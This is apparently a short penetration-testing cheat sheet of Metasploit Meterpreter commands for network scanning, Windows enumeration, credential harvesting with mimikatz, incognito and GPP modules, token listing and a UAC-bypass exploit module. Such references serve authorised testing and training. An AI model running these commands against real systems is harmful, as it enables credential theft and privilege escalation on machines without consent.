Metasploit

Meterpreter

Arp Scan

1
run arp_scanner -r <iP>/24
Copied!

Nmap

1
db_nmap -sS -A <IP>
Copied!

PortScan

1
run auxiliary/scanner/portscan/tcp
Copied!

Application Info

1
run post/windows/gather/enum_applications
Copied!

Credential Gathering

1
run post/windows/gather/credentials/credential_collector
2
​
3
load mimikatz
4
wdigest
5
​
6
load incognito
7
list_tokens -u
Copied!

Windows

1
# Collect a load of info
2
run winenum
3
​
4
# Show privs
5
run post/windows/gather/win_privs
6
​
7
# Run as
8
use exploit/windows/local/run_as
9
​
10
# Bypass UAC
11
use exploit/windows/local/bypassuac_injection
Copied!
1
# Enumeration ADSI
2
load extapi
3
help extapi
4
​
5
adsi_computer_enum domainname
6
​
7
# GPP
8
use post/windows/gather/credentials/gpp
Copied!
Last modified 10mo ago